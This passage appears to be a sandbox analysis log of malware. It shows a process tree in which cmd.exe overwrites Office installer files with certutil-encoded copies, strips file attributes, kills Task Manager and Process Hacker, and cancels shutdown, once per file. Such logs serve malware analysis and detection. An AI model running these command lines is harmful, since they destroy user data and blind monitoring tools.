    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1712
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:912
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "OneNoteMUI.msi" "OneNoteMUI.msi".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1352
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:328
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "OneNoteMUI.msi" "OneNoteMUI.msi".14849
        5⤵
        
        PID:944
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1884
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1628
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "OneNoteMUI.xml" "OneNoteMUI.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:572
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Views/modifies file attributes
        
        PID:852
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "OneNoteMUI.xml" "OneNoteMUI.xml".14849
        5⤵
        
        PID:648
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1088
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1776
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "OnoteLR.cab" "OnoteLR.cab".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1820
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1436
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "OnoteLR.cab" "OnoteLR.cab".14849
        5⤵
        
        PID:1660
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1488
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:592
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Setup.xml" "Setup.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1732
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1880
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "Setup.xml" "Setup.xml".14849
        5⤵
        
        PID:1928
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1592
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:660
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "GrooveLR.cab" "GrooveLR.cab".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:680
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1840
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "GrooveLR.cab" "GrooveLR.cab".14849
        5⤵
        
        PID:1964
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1540
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1572
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "GrooveMUI.msi" "GrooveMUI.msi".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1692
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1576
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "GrooveMUI.msi" "GrooveMUI.msi".14849
        5⤵
        
        PID:1848
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:760
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1252
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "GrooveMUI.xml" "GrooveMUI.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1908
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1464
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "GrooveMUI.xml" "GrooveMUI.xml".14849
        5⤵
        
        PID:1712
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        Kills process with taskkill
        
        PID:912
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1164
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Setup.xml" "Setup.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:2036
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1452
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "Setup.xml" "Setup.xml".14849
        5⤵
        
        PID:1884
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1628
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1920
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "1033" "1033".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1748
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "branding.xml" "branding.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1688
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:656
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "branding.xml" "branding.xml".14849
        5⤵
        
        PID:1516
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:636
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1660
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "DW20.EXE" "DW20.EXE".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1700
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1656
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "DW20.EXE" "DW20.EXE".14849
        5⤵
        
        PID:1944
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:332
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1152
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "dwdcw20.dll" "dwdcw20.dll".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:436
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1816
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "dwdcw20.dll" "dwdcw20.dll".14849
        5⤵
        
        PID:1640
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1732
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1624
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "dwtrig20.exe" "dwtrig20.exe".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1520
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1336
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "dwtrig20.exe" "dwtrig20.exe".14849
        5⤵
        
        PID:1596
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:680
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1568
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Microsoft.VC90.CRT.manifest" "Microsoft.VC90.CRT.manifest".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1296
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1888
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "Microsoft.VC90.CRT.manifest" "Microsoft.VC90.CRT.manifest".14849
        5⤵
        
        PID:1940
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1512
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1456
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "msvcr90.dll" "msvcr90.dll".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1316
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1736
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "msvcr90.dll" "msvcr90.dll".14849
        5⤵
        
        PID:944
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:672
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1884
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "OfficeLR.cab" "OfficeLR.cab".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:692
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1468
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "OfficeLR.cab" "OfficeLR.cab".14849
        5⤵
        
        PID:1628
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1920
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1776
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "OfficeMUI.msi" "OfficeMUI.msi".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1652
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1900
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "OfficeMUI.msi" "OfficeMUI.msi".14849
        5⤵
        
        PID:1436
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1716
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1488
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "OfficeMUI.xml" "OfficeMUI.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1944
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1892
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "OfficeMUI.xml" "OfficeMUI.xml".14849
        5⤵
        
        PID:612
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:332
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1816
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "OfficeMUISet.msi" "OfficeMUISet.msi".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:660
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Views/modifies file attributes
        
        PID:1204
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "OfficeMUISet.msi" "OfficeMUISet.msi".14849
        5⤵
        
        PID:1964
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:316
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1540
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "OfficeMUISet.xml" "OfficeMUISet.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1428
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1596
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "OfficeMUISet.xml" "OfficeMUISet.xml".14849
        5⤵
        
        PID:1960
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        Kills process with taskkill
        
        PID:1148
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1520
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "osetupui.dll" "osetupui.dll".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1252
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1940
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "osetupui.dll" "osetupui.dll".14849
        5⤵
        
        PID:1564
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1464
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1296
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "pss10r.chm" "pss10r.chm".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1164
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:944
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "pss10r.chm" "pss10r.chm".14849
        5⤵
        
        PID:900
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1696
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1316
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "setup.chm" "setup.chm".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:648
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1248
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "setup.chm" "setup.chm".14849
        5⤵
        
        PID:1748
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1548
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1352
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Setup.xml" "Setup.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1900
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:572
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "Setup.xml" "Setup.xml".14849
        5⤵
        
        PID:1656
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        Kills process with taskkill
        
        PID:1660
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1832
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ShellUI.MST" "ShellUI.MST".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1892
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Views/modifies file attributes
        
        PID:1880
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "ShellUI.MST" "ShellUI.MST".14849
        5⤵
        
        PID:1592
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:964
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1928
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "dwintl20.dll" "dwintl20.dll".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1204
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1460
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "dwintl20.dll" "dwintl20.dll".14849
        5⤵
        
        PID:1964
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1624
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1540
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Office64MUI.msi" "Office64MUI.msi".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1848
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1576
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "Office64MUI.msi" "Office64MUI.msi".14849
        5⤵
        
        PID:1960
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1992
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1520
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Office64MUI.xml" "Office64MUI.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1712
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1068
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "Office64MUI.xml" "Office64MUI.xml".14849
        5⤵
        
        PID:1564
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1684
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1296
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Office64MUISet.msi" "Office64MUISet.msi".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1420
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1452
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "Office64MUISet.msi" "Office64MUISet.msi".14849
        5⤵
        
        PID:900
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1792
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1316
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Office64MUISet.xml" "Office64MUISet.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1628
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:656
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "Office64MUISet.xml" "Office64MUISet.xml".14849
        5⤵
        
        PID:1748
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:520
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1352
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "OWOW64LR.cab" "OWOW64LR.cab".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1436
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1688
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "OWOW64LR.cab" "OWOW64LR.cab".14849
        5⤵
        
        PID:1656
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        Kills process with taskkill
        
        PID:592
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:636
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Setup.xml" "Setup.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1880
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1700
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "Setup.xml" "Setup.xml".14849
        5⤵
        
        PID:1816
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1988
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1820
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Access.en-us" "Access.en-us".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1460
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "AccessMUISet.msi" "AccessMUISet.msi".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1664
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:316
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "AccessMUISet.msi" "AccessMUISet.msi".14849
        5⤵
        
        PID:1336
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1388
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1680
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "AccessMUISet.xml" "AccessMUISet.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1480
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1888
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "AccessMUISet.xml" "AccessMUISet.xml".14849
        5⤵
        
        PID:764
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:680
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:868
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Setup.xml" "Setup.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:556
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1736
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "Setup.xml" "Setup.xml".14849
        5⤵
        
        PID:1464
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        Kills process with taskkill
        
        PID:1512
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1600
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "AccessMUI.msi" "AccessMUI.msi".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:328
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Views/modifies file attributes
        
        PID:1468
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "AccessMUI.msi" "AccessMUI.msi".14849
        5⤵
        
        PID:1696
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:672
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1088
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "AccessMUI.xml" "AccessMUI.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1776
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:692
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "AccessMUI.xml" "AccessMUI.xml".14849
        5⤵
        
        PID:1548
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:744
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1016
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "AccLR.cab" "AccLR.cab".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:816
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1832
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "AccLR.cab" "AccLR.cab".14849
        5⤵
        
        PID:1932
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1660
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1436
  - - C:\Windows\system32\cmd.exe
